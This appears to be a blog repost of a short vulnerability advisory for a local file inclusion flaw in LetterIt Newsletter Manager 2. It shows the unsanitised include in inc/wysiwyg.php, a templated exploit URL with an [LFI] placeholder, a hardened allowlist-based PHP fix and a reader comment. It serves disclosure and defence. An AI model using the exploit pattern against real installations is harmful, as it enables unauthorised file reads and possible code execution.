LFI to RCE via access_log injection

LetterIt 2 - LFI


[o] LetterIt 2 Local File Inclusion Vulnerability
Software : LetterIt Newsletter Manager version 2
Vendor : http://www.letterit.de/
Author : NoGe


[o] Vulnerable file
inc/wysiwyg.php
include("../language/".$_GET['language'].".php");
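
A hardened form of the include above, as an added example that is not LetterIt's own code or a vendor patch: the `language` value is looked up in a list of files that actually exist in the language directory instead of being concatenated into the path. The flat `<name>.php` layout and the `english` default name are assumptions.

```php
<?php
// Added example: hardened replacement for the include in inc/wysiwyg.php.
// Assumptions (not from the advisory): language files are named <name>.php
// directly inside ../language/, and 'english' is a hypothetical default.

const LANG_DIR = __DIR__ . '/../language';
const DEFAULT_LANG = 'english'; // hypothetical default name

// Map a user-supplied language name to a file inside $langDir, or null.
function resolve_language_file($requested, string $langDir): ?string
{
    // Reject arrays (?language[]=x) and anything but a short plain token.
    // No dots, slashes, NUL bytes or URL schemes can pass this pattern.
    if (!is_string($requested) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    $base = realpath($langDir);
    if ($base === false) {
        return null;
    }
    // Build the allowlist from files that actually exist in the directory.
    $allowed = [];
    foreach (glob($base . '/*.php') ?: [] as $file) {
        $allowed[basename($file, '.php')] = $file;
    }
    if (!isset($allowed[$requested])) {
        return null;
    }
    // Defence in depth: the resolved path must still sit under $langDir
    // (guards against a symlink placed inside the language directory).
    $real = realpath($allowed[$requested]);
    if ($real === false || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Fall back to the default language when the request names no known file.
$file = resolve_language_file($_GET['language'] ?? DEFAULT_LANG, LANG_DIR)
     ?? resolve_language_file(DEFAULT_LANG, LANG_DIR);
if ($file === null) {
    http_response_code(500);
    exit('Language file not available.');
}
include $file;
```

Because the included path always comes from the directory listing, the request can only select among existing language files and never contributes path components of its own.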


[o] Exploit
http://localhost/[path]/inc/wysiwyg.php?language=[LFI]


[o] Publish
http://milw0rm.com/exploits/6179


Comments

labatterie said…
Thank you so much for the information...